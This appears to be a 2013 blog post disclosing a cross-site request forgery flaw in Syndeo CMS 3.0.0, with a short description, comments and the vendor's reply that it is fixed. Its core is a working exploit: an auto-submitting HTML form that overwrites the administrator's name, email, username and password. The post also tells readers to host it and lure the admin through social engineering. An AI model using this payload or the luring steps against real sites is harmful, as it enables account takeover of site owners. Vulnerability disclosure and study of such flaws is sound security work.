Syndeo CMS Admin Password Change through CSRF


# Exploit Title: Syndeo CMS Admin Password Change through CSRF
# Google Dork: none
# Date: 5/12/2013
# Exploit Author: Aditya Joshi
# Vendor Homepage: http://www.syndeocms.org/
# Software Link: http://sourceforge.net/projects/syndeocms/files/1.%20SyndeoCMS/
# Version: 3.0.0
# Tested on: Windows 7
# Status: Fixed

Discription ...
In Syndeo CMS an attacker can easily change admin name, password, email through CSRF vulnerability.
The vulnerability exists in http://localhost/cms/starnet/index.php?option=configuration&save=personal , where admin name , password change text fields are without any token.

Exploiting the BUG ...
Create a html page and paste following html code in it ...

exploit.html


<html><body onload="form1.submit();"><form method="POST" name="form1" action="http://localhost/cms/starnet/index.php?option=configuration&save=personal"><input class="textfield" type="text" value="hacker" size="40" name="fullname" tabindex="1"></input><input class="textfield" type="text" value="hacker@email.com" size="40" name="email" tabindex="2"></input><input class="textfield" type="text" value="admin" size="20" name="username" tabindex="3"></input><input class="textfield" type="password" value="hacker" size="20" name="password" tabindex="4"></input></form></body></html>


and upload malicious page to any free webhosting website..
Now send link of mailicous html page through Social Engenerring to the admin of the vulnerable syndeo web app

To Fix this bug kindly visit this link 

Greets ---> Aditya Dixit, Deejay alone , Indian Web King....

Syndeo CMS Admin Password Change through CSRF Reviewed by Aditya Joshi on 18:21:00 Rating: 5

3 comments:

  1. I have fixed this exploit , see our forum: http://www.syndeocms.org/forum/index.php?topic=2208.0

    Kind regards Fred Stuurman
    Main developer SyndeoCMS

    ReplyDelete
    Replies
    1. there are so many exploits in it

      Delete
  2. Good wrk bro, in the next update of ur cms i will surely try to find bugs and will report to u

    ReplyDelete

Share your problems but don't spam here

All Rights Reserved by Cyber Sucks © 2015 - 2016

Contact Form

Name

Email *

Message *

Powered by Blogger.